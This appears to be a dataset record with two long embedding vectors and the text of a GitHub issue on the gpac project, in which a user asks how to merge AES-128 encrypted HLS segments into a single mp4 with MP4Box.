0.004636458121240139, -0.002036383142694831, 0.008563634939491749, 0.004632724914699793, -0.004879106767475605, 0.02424994483590126, 0.003979439847171307, 0.0034885425120592117, 0.012901447713375092, 0.015529520809650421, -0.00747731514275074, -0.012744659557938576, 0.015208478085696697, 0.0027046003378927708, -0.004266885109245777, 0.013356881216168404, 0.0005912230699323118, -0.010333104059100151, -0.012468413449823856, -0.0005249612731859088, -0.005730243865400553, -0.011199173517525196, -0.017560305073857307, -0.004845509305596352, -0.0004143694241065532, -0.022159431129693985, 0.006887491792440414, -0.018142661079764366, 0.02254766970872879, -0.004072766285389662, 0.013468872755765915, 0.0023947565350681543, 0.02180105820298195, 0.004166092723608017, -0.002637405414134264, 0.0020699806045740843, 0.0189937986433506, 0.01957615651190281, -0.0023798244073987007, -0.010572019964456558, -0.008712956681847572, 0.019994258880615234, -0.006644843146204948, 0.0015753504121676087, -0.017022743821144104, 0.008869745768606663, 0.00356507021933794, -0.01122903823852539, -0.007499713450670242, 0.0025328798219561577, -0.009056398645043373, -0.023428671061992645, -0.019561223685741425, 0.007996209897100925, 0.0282965786755085, 0.00288005406036973, -0.011341029778122902, -0.0003511407703626901, -0.0009883270831778646, -0.031865380704402924, -0.0025384793989360332, -0.0013989635044708848, 0.024892030283808708, -0.010810935869812965, -0.01806800067424774, -0.0094968993216753, -0.030969448387622833, 0.03404548764228821, 0.02124856598675251, 0.008705491200089455, -0.025773031637072563, -0.0063387323170900345, 0.006622444838285446, -0.006592580117285252, -0.012901447713375092, -0.025250403210520744, 0.03625545650720596, -0.0011068516178056598, -0.009997129440307617, 0.006334999110549688, 0.010303239338099957, -0.013386745937168598, 0.0016378791769966483, 0.012162302620708942, -0.009519297629594803, 0.008063404820859432, 0.026728695258498192, 0.01232655718922615, -0.013879509642720222, 0.01691821776330471, 0.007611704990267754, -0.014894900843501091, -0.015238341875374317, -0.013200093060731888, 0.012572938576340675, -0.0006448857602663338, -0.004177291877567768, -0.005188950337469578, -0.012625201605260372, 0.0008917342056520283, 0.009287848137319088, 0.012819320894777775, 0.0033578856382519007, 0.0004300016153138131, -0.006921089254319668, 0.009235585108399391, -0.0013709655031561852, -0.010250977240502834, 0.020666208118200302, -0.0029901794623583555, 0.0012953710975125432, -0.013356881216168404, 0.02205490693449974, -0.004315414931625128, -0.015148748643696308, -0.007361590396612883, 0.0004612659686245024, -0.02427980862557888, -0.0036621298640966415, -0.037778545171022415, 0.018486103042960167, -0.020487021654844284, 0.007943946868181229, -0.0072869290597736835, -0.007899150252342224, -0.010460028424859047, 0.022039974108338356, -0.019844936206936836, 0.003176832338795066, -0.021487481892108917, -0.02069607377052307, 0.04345279559493065, 0.008683092892169952, 0.005681714043021202, 0.00025478118914179504, -0.008138066157698631, -0.016873421147465706, -0.005887032486498356, -0.018545832484960556, 0.003074173117056489, 0.021144039928913116, -0.00884734746068716, -0.02072593756020069, 0.013618195429444313, -0.0224879402667284, -0.01923271454870701, 0.00032500934321433306, -0.022876178845763206, -0.03553871065378189, 0.001124583650380373, -0.0036434645298868418, 0.001572550623677671, -0.005864634178578854, -0.022473009303212166, -0.011662072502076626, -0.002107311272993684, 0.012408684007823467, -0.009093728847801685, -0.0033466864842921495, -0.0008273389539681375, 0.0282965786755085, 0.02269699238240719, -0.00675683468580246, -0.02035263180732727, -0.00282965786755085, 0.0023032967001199722, -0.026758559048175812, -0.000014815573194937315, -0.017022743821144104, 0.013103033415973186, -0.02332414500415325, 0.02307029813528061, 0.014820239506661892, 0.023234551772475243, 0.0007466115639545023, 0.02514587715268135, -0.011176775209605694, 0.006786699406802654, 0.0039047785103321075, 0.0004216022207401693, 0.011632208712399006, -0.009265449829399586, -0.008436710573732853, 0.004774581175297499, -0.005039628129452467, -0.012393752112984657, 0.006868826691061258, 0.011408224701881409, -0.026116473600268364, -0.009832874871790409, -0.006764301098883152, 0.02183092199265957, 0.010243510827422142, -0.022308753803372383, -0.0023947565350681543, 0.003775988006964326, 0.014730646274983883, 0.015089020133018494, 0.004240753594785929, -0.012565473094582558, 0.008070871233940125, -0.0007578107761219144, -0.0042108893394470215, 0.0022062372881919146, -0.014745579101145267, 0.005853434558957815, 0.006670974660664797, -0.0019318574341014028, -0.00411382969468832, 0.020024122670292854, -0.0003413414815440774, 0.014805307611823082, 0.003908511716872454, 0.006730703171342611, 0.009855273179709911, 0.005928095895797014, 0.006144613493233919, -0.00884734746068716, 0.006958419922739267, -0.012423616833984852, 0.025802895426750183, -0.014215484261512756, -0.004576729144901037, -0.019680680707097054, -0.009205720387399197, 0.008182862773537636, 0.011363428086042404, 0.061938896775245667, 0.0046961866319179535, -0.003859981894493103, 0.021084310486912727, 0.009541695937514305, 0.015843097120523453, 0.010385367088019848, 0.021457616239786148, 0.009877671487629414, 0.01790374517440796, 0.01729152351617813, 0.003337353700771928, -0.0019878533203154802, 0.00867562647908926, -0.007734896149486303, -0.002422754652798176, -0.019680680707097054, 0.006603779271245003, -0.003062973963096738, 0.01478290930390358, 0.012886515818536282, 0.010825867764651775, 0.00866069458425045, -0.013640593737363815, -0.009444636292755604, 0.004483402706682682, -0.008907075971364975, 0.006047553848475218, 0.00016553778550587595, -0.024892030283808708, 0.01876981556415558, 0.0009668620186857879, 0.002034516539424658, 0.00615581264719367, -0.021606938913464546, -0.007436251267790794, 0.01772455871105194, 0.004136228002607822, -0.00003668895806185901, 0.0072869290597736835, 0.0019990524742752314, 0.016246268525719643, 0.00029234509565867484, 0.02511601336300373, -0.0074474504217505455, 0.01596255600452423, -0.008481507189571857, 0.024115553125739098, 0.000597755890339613, 0.002269699238240719, -0.003830117406323552, 0.010109120979905128, 0.024996556341648102, -0.012117506004869938, -0.0021203767973929644, 0.0014185620239004493, -0.00680536450818181, 0.009168390184640884, 0.0028501898050308228, 0.012110039591789246, 0.01407362800091505, 0.01105731725692749, 0.024697910994291306, 0.0008749354165047407, -0.00043653446482494473, 0.0007321459706872702, 0.000870735733769834, 0.0013373680412769318, -0.027788883075118065, 0.009885136969387531, -0.014282679185271263, 0.002982713282108307, 0.00001628838072065264, 0.001967321615666151, -0.020457157865166664, -0.010460028424859047, 0.015186079777777195, -0.014678383246064186, 0.010430163703858852, -0.006723237223923206, 0.004580461885780096, -0.005916896741837263, -0.013588330708444118, -0.005771307274699211, -0.007734896149486303, -0.007242132443934679, -0.005666781682521105, -0.006439524702727795, -0.0047783139161765575, -0.0046065934002399445, -0.02595221810042858, 0.008914542384445667, 0.009213186800479889, 0.019247647374868393, -0.013005973771214485, 0.03368711471557617, 0.0396600067615509, -0.007611704990267754, -0.006286469288170338, -0.01570870727300644, 0.004819377791136503, 0.014290145598351955, 0.02999885380268097, 0.022771652787923813, 0.0024488859344273806, -0.009982196614146233, -0.011370894499123096, 0.0029864462558180094, 0.007544510066509247, -0.0007358790608122945, 0.0015240209177136421, 0.004584195092320442, -0.0211589727550745, -0.0036901277489960194, -0.005062026437371969, -0.0322834849357605, 0.0010144584812223911, -0.01404376421123743, 0.02566850557923317, -0.002745663980022073, 0.015469792298972607, 0.002209970261901617, -0.014118424616754055, 0.0009957931470125914, -0.02372731640934944, -0.004976165946573019, -0.009190788492560387, 0.01176659855991602, 0.005390535574406385, 0.0005618252325803041, -0.02350333333015442, 0.022473009303212166, 0.005218815058469772, 0.00929531455039978, -0.007634103298187256, 0.0008600032306276262, -0.000058970650570699945, -0.007697565481066704, 0.030939584597945213, 0.0003037775750271976, 0.01963588409125805, 0.0229807049036026, -0.013954170048236847, -0.006950953975319862, -0.02378704398870468, -0.001924391370266676, 0.018023204058408737, -0.013722720555961132, -0.017739491537213326, 0.0008777352632023394, -0.02774408645927906, 0.010012061335146427, -0.0020550484769046307, -0.01809786446392536, 0.009213186800479889, 0.005028428975492716, 0.0033653515856713057, -0.009131059981882572, -0.003787187160924077, 0.0010041926288977265, 0.01873994991183281, 0.014245348982512951, -0.02740064449608326, 0.014551459811627865, 0.011602343991398811, 0.002433953806757927, -0.0031339020933955908, -0.021517345681786537, 0.009019067510962486, 0.0017536039231345057, 0.015096486546099186, 0.0093998396769166, -0.013297151774168015, -0.024130485951900482, 0.006547783501446247, 0.013588330708444118, 0.0005566922482103109, 0.0010863197967410088, 0.0007601439137943089, 0.0094968993216753, -0.0050694928504526615, 0.02118883654475212, 0.006525385193526745, 0.009302780032157898, -0.0152308763936162, -0.006786699406802654, 0.006876292638480663, 0.006629910785704851, 0.005151619669049978, -0.021442685276269913, -0.0010153917828574777, 0.00001771744246070739, -0.009056398645043373, 0.026265796273946762, 0.004087698180228472, -0.016664370894432068, -0.008600965142250061, -0.029147716239094734, -0.017933610826730728, 0.011124512180685997, 0.008720423094928265, -0.0046065934002399445, 0.007462382782250643, -0.004259419161826372, -0.012617736123502254, 0.01470824796706438, -0.004091431386768818, -0.0029752471018582582, -0.0032626925967633724, 0.016753964126110077, -0.004565529990941286, 0.012266828678548336, 0.006252871826291084, 0.0012496411800384521, -0.001332701649516821, -0.013864576816558838, -0.013364347629249096, 0.017858948558568954, 0.017276592552661896, -0.02133815921843052, -0.0036602632608264685, -0.03305996209383011, 0.01479784119874239, -0.015156215056777, 0.028341375291347504, -0.0076005058363080025, -0.0033989492803812027, 0.02289111167192459, 0.024145418778061867, 0.009817942045629025, 0.01576843671500683, -0.005935561843216419, 0.00729066226631403, 0.007876751944422722, 0.029789801687002182, -0.01260280329734087, 0.015006892383098602, 0.01896393485367298, -0.01014645118266344, 0.01234148908406496, -0.010572019964456558, 0.01105731725692749, 0.026624169200658798, -0.010348036885261536, -0.011833793483674526, 0.017425913363695145, -0.0038674480747431517, -0.006055019795894623, 0.007193602621555328, 0.006465656217187643, 0.020740870386362076, -0.003318688366562128, 0.018859408795833588, 0.007891684770584106, -0.016096945852041245, 0.025832761079072952, 0.007570641580969095, 0.008511371910572052, 0.013117965310811996, 0.0035893351305276155, -0.007021882105618715, 0.011512750759720802, 0.007469848729670048, -0.00415116036310792, 0.02462325058877468, 0.01407362800091505, -0.015484724193811417, -0.014588790014386177, -0.007589306682348251, -0.03673328831791878, 0.01871008612215519, 0.000734945759177208, 0.01818745769560337, 0.017575236037373543, 0.023085229098796844, 0.0014997560065239668, -0.003942109178751707, -0.000730279425624758, -0.005875833332538605, 0.017082473263144493, -0.011915921233594418, 0.007697565481066704, -0.02433953806757927, 0.0007218800601549447, 0.0014876235509291291, 0.005771307274699211, 0.0022230360191315413, -0.005375603213906288, 0.009056398645043373, -0.012446015141904354, -0.009623823687434196, 0.012393752112984657, 0.02916264906525612, 0.026459913700819016, 0.007652768865227699, 0.010691477917134762, 0.0012384419096633792, -0.027042271569371223, 0.0072794631123542786, -0.013192626647651196, 0.033328741788864136, -0.011169308796525002, -0.0032869575079530478, -0.012841719202697277, 0.008250057697296143, 0.0016733432421460748, -0.003062973963096738, 0.014222950674593449, -0.015410062856972218, 0.021890651434659958, 0.011900988407433033, -0.0060326214879751205, -0.0034568116534501314, 0.014021365903317928, -0.018665289506316185, 0.015589249320328236, 0.028908800333738327, 0.00838444847613573, 0.023339077830314636, 0.0011973782675340772, 0.0008558035478927195, 0.0011563146254047751, 0.012893982231616974, 0.01596255600452423, -0.00785435363650322, 0.017425913363695145, 0.008123134262859821, -0.015977486968040466, -0.01824718713760376, 0.008078337647020817, -0.01079600304365158, 0.004397542215883732, 0.009519297629594803, 0.01920284889638424, 0.006876292638480663, -0.013760051690042019, 0.023801976814866066, 0.0038637148682028055, -0.016873421147465706, -0.010549621656537056, 0.0003632731968536973, -0.004897771868854761, -0.0006448857602663338, 0.010079256258904934, -0.0035202736034989357, -0.0006154879229143262, 0.0095715606585145, -0.0032328281085938215, 0.007988743484020233, 0.007133873645216227, 0.0016313462983816862, 0.001085386611521244, 0.02725132182240486, 0.02722145803272724, -0.010124052874743938, -0.004169825464487076, -0.015514588914811611, 0.0004057367332279682, -0.0002277165331179276, 0.011684470809996128, -0.01685849018394947, -0.015559385530650616, -0.0007797424914315343, -0.0029155181255191565, 0.005819837097078562, 0.005379336420446634, -0.005427866242825985, -0.011370894499123096, 0.002374224830418825, 0.0064208596013486385, 0.009952331893146038, 0.002868854906409979, 0.0168286245316267, -0.0021334425546228886, 0.0020513152703642845, 0.003382150549441576, -0.018291983753442764, -0.01212497241795063, 0.008780152536928654, 0.013894441537559032, 0.012722261250019073, 0.02422007918357849, 0.002228635596111417, 0.004625258501619101, 0.002383557381108403, 0.021457616239786148, -0.006596313323825598, -0.014633586630225182, 0.0001446559908799827, 0.01744084618985653, 0.008623363450169563, 0.006334999110549688, 0.014103492721915245, -0.010377900674939156, 0.005364404059946537, 0.015887893736362457, -0.007958879694342613, 0.01066907960921526, 0.017709625884890556, -0.00019855202117469162, 0.010564553551375866, -0.01988973282277584, 0.019620953127741814, 0.013401677832007408, 0.010982655920088291, -0.010318172164261341, 0.005118022207170725, 0.019322307780385017, 0.03401562198996544, -0.0037442571483552456, -0.0009593958966434002, -0.01260280329734087, 0.009302780032157898, -0.0069770850241184235, -0.029610615223646164, 0.041959572583436966, 0.002616873476654291, -0.014036297798156738, 0.0020699806045740843, -0.002924850909039378, 0.005002297461032867, 0.00598409166559577, -0.00310403760522604, -0.009459569118916988, 0.016529981046915054, 0.033388469368219376, -0.021547209471464157, 0.004360211547464132, -0.007376522291451693, -0.021980244666337967, 0.0038450495339930058, 0.022353550419211388, -0.0030816392973065376, -0.005461463704705238, 0.0076900990679860115, 0.0032645592000335455, 0.01048242673277855, -0.013745118863880634, -0.01022111251950264, 0.017933610826730728, -0.021577075123786926, -0.009885136969387531, 0.0035370723344385624, -0.02505628392100334, -0.010639214888215065, 0.009302780032157898, 0.007111475337296724, 0.009661153890192509, -0.02260739915072918, -0.007951413281261921, -0.00017428713908884674, 0.0038637148682028055, 0.0029043189715594053, -0.0044460720382630825, 0.0031936310697346926, -0.004744716454297304, -0.04172065481543541, 0.013506203889846802, 0.000013036537893640343, 0.013573398813605309, 0.01564897783100605, 0.017201930284500122, -0.008369515649974346, 0.027759019285440445, 0.003074173117056489, -0.010825867764651775, 0.025832761079072952, 0.012595336884260178, 0.004610326606780291, 0.018814612179994583, -0.015828166157007217, 0.008406846784055233, 0.008063404820859432, -0.004483402706682682, -0.006924822460860014, -0.01368539035320282, 0.010982655920088291, 0.0007190802716650069, -0.030879855155944824, -0.015051688998937607, -0.0018646623939275742, -0.015066621825098991, -0.0035389389377087355, 0.0038021195214241743, -0.008638296276330948, 0.00017545372247695923, -0.022786585614085197, 0.01856076344847679, 0.016559844836592674, 0.007634103298187256, 0.019994258880615234, 0.005827303510159254, 0.003665862837806344, 0.0186503566801548, -0.02183092199265957, 0.008160464465618134, -0.0050769587978720665, 0.017649898305535316, -0.001058321911841631, -0.00026808021357282996, -0.03207443282008171, 0.009788078255951405, 0.0001952855964191258, 0.014917299151420593, -0.022278890013694763, -0.0002118510310538113, -0.009168390184640884, -0.010661613196134567, -0.0019486561650410295, 0.011281301267445087, 0.019874799996614456, 0.005461463704705238, -0.028162188827991486, 0.0024768838193267584, -0.0009234651806764305, -0.0018357312073931098, 0.018426373600959778, -0.004307948984205723, -0.0004405008221510798, -0.020860327407717705, 0.007443717215210199, 0.00929531455039978, -0.00821272749453783, -0.013879509642720222, 0.0004192690539639443, -0.02740064449608326, -0.004692453891038895, 0.02746037393808365, 0.010228578932583332, 0.002758729737251997, 0.0169779472053051, 0.02072593756020069, -0.005528658628463745, -0.0025422123726457357, 0.014872502535581589, 0.007548243273049593, 0.010557088069617748, -0.021636802703142166, -0.0051665520295500755, 0.006614978425204754, -0.007742362096905708, -0.006592580117285252, 0.05050080642104149, 0.012916380539536476, 0.011154376901686192, 0.0043004825711250305, 0.0056219850666821, 0.007929014973342419, -0.020248105749487877, -0.01576843671500683, -0.00931024644523859, 0.00906386412680149, 0.005748908966779709, 0.017276592552661896, 0.009272916242480278, 0.00036210662801750004, -0.0035202736034989357, 0.010124052874743938, -0.00831725262105465, -0.007264530751854181, -0.008981737308204174, -0.024473927915096283, -0.0038133186753839254, -0.021173903718590736, 0.027579830959439278, -0.010198714211583138, -0.016709167510271072, 0.00200651865452528, 0.010467493906617165, -0.013185160234570503, -0.013132898136973381, 0.008003676310181618, 0.02869974821805954, -0.0029379166662693024, -0.023204687982797623, 0.009750747121870518, 0.0013793648686259985, 0.00456179678440094, 0.022532736882567406, 0.018053067848086357, 0.009623823687434196, -0.021890651434659958, 0.005812371149659157, 0.001421361812390387, -0.004442338831722736, 0.016589708626270294, -0.016619574278593063, 0.003076039720326662, 0.004584195092320442, 0.02910291962325573, 0.027535034343600273, -0.001094719278626144, 0.010250977240502834, 0.015559385530650616, -0.0038637148682028055, 0.0032216289546340704, 0.0000029419704787869705, 0.003014444140717387, -0.005278544034808874, -0.001762003288604319, 0.0007568774744868279, -0.0026840686332434416, -0.004684987477958202, -0.011355961672961712, -0.007186136674135923, -0.004882839508354664, -0.020337698981165886, 0.0019075926393270493, 0.00929531455039978, 0.02072593756020069, -0.010340570472180843, 0.025817828252911568, -0.004457271192222834, -0.0046065934002399445, -0.0052374801598489285, 0.002323828637599945, -0.02133815921843052, -0.0009304646519012749, -0.0019169251900166273, -0.008787618018686771, 0.016724098473787308, 0.0057825068943202496, 0.001661210786551237, -0.007973811589181423, 0.015193545259535313, -0.003759189276024699, 0.0033970826771110296, 0.002992045832797885, -0.013334482908248901, 0.0033952160738408566, -0.00929531455039978, 0.0068240296095609665, 0.015723640099167824, -0.003949575126171112, -0.008429245091974735, -0.007630370557308197, 0.01176659855991602, -0.018262119963765144, -0.0019206582801416516, -0.003848782740533352, -0.00016728765331208706, -0.002762462943792343, 0.006876292638480663, -0.0039682406932115555, -0.01859062910079956, 0.002799793379381299, 0.011079715564846992, 0.011796463280916214, 0.0012785723665729165, -0.0152308763936162, -0.011236504651606083, 0.009160923771560192, 0.014387205243110657, -0.005118022207170725, -0.025280268862843513, -0.0035893351305276155, 0.022473009303212166, -0.0030499082058668137, -0.012953710742294788, 0.003462411230430007, 0.0244589950889349, 0.0036602632608264685, 0.004184757824987173, -0.00005477096055983566, 0.016813693568110466, 0.0039122444577515125, 0.01130369957536459, 0.005685447249561548, -0.005338273011147976, 0.006738169584423304, 0.004307948984205723, 0.007518378552049398, 0.0009901935700327158, -0.01469331607222557, 0.01130369957536459, -0.0019467896781861782, 0.004154893569648266, 0.024892030283808708, 0.003693860722705722, 0.018545832484960556, 0.021532278507947922, 0.007339191623032093, 0.011326097883284092, 0.051575928926467896, 0.006715771276503801, 0.0062491390854120255, -0.00617074454203248, 0.024727774783968925, -0.007861820049583912, 0.01876981556415558, -0.0026560707483440638, 0.010004594922065735, 0.01859062910079956, 0.03386630117893219, 0.009056398645043373, 0.004207156132906675, -0.001512821763753891, -0.014275213703513145, 0.020666208118200302, 0.02474270761013031, -0.016753964126110077, 0.0008744688238948584, -0.012371353805065155, -0.008757754229009151, -0.007817023433744907, -0.003288824111223221, 0.0015818832907825708, 0.004602860193699598, -0.014917299151420593, -0.022413279861211777, 0.018008271232247353, -0.01654491201043129, -0.00176666968036443, -0.020218241959810257, 0.01215483620762825, -0.01196818333119154, 0.015484724193811417, 0.00692855566740036, 0.02006891928613186, -0.0007326126215048134, 0.014641053043305874, 0.00729066226631403, 0.01859062910079956, 0.004326614085584879, -0.021293362602591515, 0.010982655920088291, 0.04345279559493065, -0.013745118863880634, -0.0027232656721025705, 0.00574517622590065, 0.010616816580295563, 0.0039047785103321075, -0.004726051352918148, -0.01567884348332882, 0.004166092723608017, -0.005106823053210974, -0.017933610826730728, 0.03222375735640526, 0.02038249559700489, 0.0005170285003259778, 0.030700668692588806, -0.006577648222446442, -0.0011535148369148374, -0.007551976013928652, -0.022876178845763206, 0.02607167698442936 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello, It might not be an issue but I was wondering if it's possible to actually merge those segments of similar m3u8 as : https://content-ause2-ur-discovery1.uplynk.com/ce6f6a0e4c0c440ca22f05e5e14a82a4/f.m3u8?pbs=294fa09c22a04e4fba447b20c5ee7f0c into one mp4. Those segments are AES 128 encrypted with IV in every segment. I tried using MP4Box following what was written in here "https://github.com/gpac/gpac/issues/1236" but I was unsuccessful with it. Any Help would be appreciated. Thanks in advance
Unable to merge segments to mp4
https://api.github.com/repos/gpac/gpac/issues/1679/comments
1
2021-01-12T03:17:46
2021-01-14T11:44:05Z
https://github.com/gpac/gpac/issues/1679
783,872,386
1,679
false
This is a GitHub Issue repo:gpac owner:gpac Title : Unable to merge segments to mp4 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello, It might not be an issue but I was wondering if it's possible to actually merge those segments of similar m3u8 as : https://content-ause2-ur-discovery1.uplynk.com/ce6f6a0e4c0c440ca22f05e5e14a82a4/f.m3u8?pbs=294fa09c22a04e4fba447b20c5ee7f0c into one mp4. Those segments are AES 128 encrypted with IV in every segment. I tried using MP4Box following what was written in here "https://github.com/gpac/gpac/issues/1236" but I was unsuccessful with it. Any Help would be appreciated. Thanks in advance --- end body ---
1,276
[ -0.03215079382061958, 0.03845258429646492, -0.01670265942811966, -0.01607539691030979, -0.00444553280249238, -0.012924502603709698, -0.03130472078919411, 0.04878051578998566, -0.024448607116937637, 0.07346252351999283, 0.025951117277145386, -0.022333424538373947, 0.0014514537760987878, -0.02087467722594738, -0.0033222974743694067, -0.012063841335475445, -0.0031873632688075304, 0.005218669306486845, -0.03098379634320736, -0.00015499192522838712, 0.015477310866117477, -0.029452111572027206, 0.01260357815772295, 0.016104571521282196, 0.006626360584050417, 0.025396794080734253, -0.022085437551140785, 0.028168413788080215, -0.02215837500989437, 0.020437052473425865, 0.010371694341301918, 0.015987873077392578, -0.004234014544636011, 0.02608240395784378, 0.05190223455429077, -0.007578193210065365, 0.035593438893556595, 0.0520772859454155, -0.010823906399309635, -0.011742916889488697, -0.018132230266928673, -0.019109591841697693, -0.037869084626436234, 0.016469258815050125, -0.005772992968559265, 0.017038170248270035, -0.012771334499120712, 0.010320638306438923, -0.03372624143958092, -0.00280991243198514, 0.000832397781778127, -0.03346366807818413, -0.013106846250593662, -0.03279264271259308, 0.008716016076505184, -0.018496917560696602, 0.04632981866598129, -0.02829970046877861, 0.00415013637393713, 0.03489324077963829, -0.005331722088158131, 0.010043476708233356, -0.006418488919734955, 0.049451541155576706, 0.03836505860090256, 0.009401627816259861, 0.0024671065621078014, 0.01350800134241581, 0.00187813735101372, 0.02205626107752323, 0.021195601671934128, -0.004361655097454786, 0.030546171590685844, -0.013551764190196991, -0.01374140102416277, -0.05715372785925865, 0.04586302116513252, 0.006692003924399614, 0.0030834274366497993, 0.03877350687980652, -0.05464468151330948, 0.03439726680517197, -0.02923329919576645, 0.0014204554026946425, 0.02581983059644699, 0.01030605100095272, -0.0725872740149498, -0.04948071390390396, -0.028270525857806206, -0.014507243409752846, 0.00752713717520237, 0.007206212729215622, 0.036001887172460556, -0.023267021402716637, 0.008438854478299618, 0.021924974396824837, -0.011122949421405792, 0.01077285036444664, -0.05216480791568756, -0.04758434370160103, -0.006994694005697966, 0.018730318173766136, -0.026563791558146477, 0.00007071506115607917, 0.030225247144699097, 0.009474565275013447, 0.05727042630314827, -0.021122664213180542, 0.013012027367949486, 0.10543826967477798, 0.0028299700934439898, 0.01587117277085781, 0.01794259436428547, 0.0023649942595511675, 0.006082977168262005, -0.025455143302679062, -0.035126637667417526, -0.027497390285134315, -0.003681513946503401, 0.012020079419016838, 0.03845258429646492, -0.006396607495844364, -0.02835805155336857, 0.030808746814727783, -0.013267308473587036, 0.054615505039691925, -0.03253006935119629, 0.012151366099715233, -0.01409879419952631, 0.006826938129961491, -0.05298170819878578, -0.02113725058734417, -0.03576848655939102, -0.016017047688364983, 0.026067817583680153, 0.004751869942992926, -0.030867096036672592, 0.01592952199280262, -0.012253479100763798, 0.02608240395784378, -0.020845500752329826, -0.02783290110528469, 0.017490381374955177, -0.023237846791744232, 0.0015417137183248997, -0.005568768363445997, 0.0008492645574733615, 0.01896371692419052, -0.029247887432575226, 0.013420476578176022, 0.005375484470278025, 0.005255137570202351, 0.007753242738544941, 0.007760536391288042, 0.004069905262440443, 0.02406933344900608, 0.008752484805881977, 0.009722552262246609, 0.004839394707232714, -0.014886518009006977, 0.01576906070113182, -0.03489324077963829, 0.014288431964814663, 0.0022756459657102823, 0.002479870803654194, -0.036877136677503586, 0.027555739507079124, 0.012464997358620167, 0.007093159481883049, 0.014514537528157234, 0.003513758070766926, -0.027249403297901154, 0.016571370884776115, 0.0040006148628890514, -0.03165481984615326, -0.03783990815281868, -0.0067321197129786015, 0.004069905262440443, -0.023777583613991737, -0.009073409251868725, -0.04679661989212036, 0.00093906867550686, -0.01670265942811966, -0.0012125838547945023, 0.020947614684700966, -0.014886518009006977, 0.048897214233875275, -0.04892639070749283, 0.0332886166870594, -0.030283598229289055, 0.018015531823039055, 0.04411252215504646, 0.017898831516504288, 0.002171710366383195, 0.03480571508407593, -0.0005397365894168615, -0.01435407530516386, -0.05076441168785095, -0.007319265510886908, -0.003552050096914172, 0.009751726873219013, -0.01613374799489975, -0.000867498863954097, -0.04303305223584175, -0.04898473992943764, 0.00876707211136818, -0.018978305160999298, 0.024244382977485657, -0.025863593444228172, -0.033171918243169785, -0.0618508942425251, -0.04160347953438759, 0.035739313811063766, 0.024550719186663628, -0.022639760747551918, 0.001516185700893402, -0.024725770577788353, -0.012224303558468819, -0.012968265451490879, 0.02866438776254654, 0.009365159086883068, -0.005550533998757601, 0.01743203215301037, 0.0018097585998475552, -0.031363070011138916, -0.01953262835741043, -0.024215208366513252, 0.006473192013800144, 0.017504969611763954, 0.02685554139316082, 0.027293166145682335, 0.021020550280809402, -0.009620439261198044, 0.01721321977674961, 0.0052478439174592495, 0.00259657041169703, -0.0022628819569945335, -0.026374153792858124, 0.013668463565409184, 0.021151838824152946, -0.02211461216211319, 0.021939562633633614, -0.01342777069658041, -0.0016009754035621881, -0.006520600989460945, 0.07422107458114624, -0.013486120849847794, 0.044054172933101654, -0.006323670502752066, 0.011925260536372662, -0.0010730910580605268, 0.011531398631632328, 0.016717245802283287, -0.006422135978937149, -0.047234244644641876, 0.032705117017030716, -0.00904423464089632, 0.021356062963604927, -0.016673482954502106, -0.03883185610175133, -0.002884673187509179, -0.01401856355369091, -0.004263189621269703, -0.012676515616476536, 0.03299686685204506, -0.024813294410705566, -0.020918438211083412, 0.016892295330762863, 0.004937860183417797, -0.01943051628768444, -0.049072265625, -0.00397143978625536, -0.00925575289875269, 0.015404373407363892, 0.0007840767502784729, 0.002875556005164981, -0.00021698868658859283, 0.0006486867787316442, -0.002098772907629609, 0.01332565862685442, -0.037956610321998596, -0.0027898545376956463, 0.009007765911519527, 0.011451167985796928, 0.010721794329583645, -0.031012970954179764, -0.008030405268073082, -0.007928292267024517, -0.03515581414103508, 0.012494171969592571, 0.029758447781205177, 0.0302544217556715, -0.011297998949885368, 0.016615133732557297, 0.0011633511167019606, 0.008511791937053204, -0.00009880735160550103, 0.018526092171669006, -0.00664824154227972, 0.03127554431557655, -0.041253380477428436, 0.024565307423472404, 0.005929808598011732, -0.005029032006859779, -0.043120574206113815, -0.004591407719999552, -0.016104571521282196, 0.01716945692896843, -0.009372452273964882, -0.03118802048265934, 0.04653404280543327, -0.04317892715334892, -0.03798578307032585, 0.03474736586213112, -0.013537176884710789, 0.010998955927789211, 0.051318734884262085, -0.004697166848927736, -0.029933497309684753, 0.003462701803073287, 0.021560287103056908, 0.03104214556515217, -0.043529026210308075, 0.026417916640639305, -0.01753414422273636, -0.0426829494535923, -0.0055432403460145, 0.002062304178252816, -0.016017047688364983, 0.03098379634320736, 0.031625647097826004, 0.02329619787633419, 0.007621955592185259, -0.0002030850009759888, 0.012785921804606915, -0.012610872276127338, -0.028314288705587387, -0.009802782908082008, 0.0423620268702507, -0.02319408394396305, -0.01798635721206665, -0.01772378198802471, 0.032909344881772995, 0.0010639739921316504, 0.0063273170962929726, 0.013136020861566067, -0.010058064013719559, 0.033697064965963364, 0.033171918243169785, 0.007417730987071991, 0.0009267604909837246, -0.01674642041325569, 0.005813108757138252, 0.009686083532869816, -0.004179311450570822, -0.0011387347476556897, 0.007209859322756529, -0.021939562633633614, 0.001269110362045467, -0.022566823288798332, 0.012618165463209152, -0.030896270647644997, 0.01902206800878048, 0.009117172099649906, -0.013456945307552814, 0.021297713741660118, -0.04274130240082741, -0.011429286561906338, -0.016148334369063377, -0.01515638642013073, 0.009489152580499649, 0.008278392255306244, -0.03127554431557655, 0.01177938561886549, -0.016469258815050125, 0.008044992573559284, 0.01845315471291542, 0.002452519256621599, -0.021560287103056908, 0.016046222299337387, -0.0544404573738575, 0.01154598593711853, 0.057708051055669785, -0.03824836015701294, 0.0023358194157481194, 0.01938675343990326, -0.004248601850122213, 0.04148677736520767, -0.04551292210817337, -0.041107505559921265, -0.004237661603838205, 0.006805057171732187, 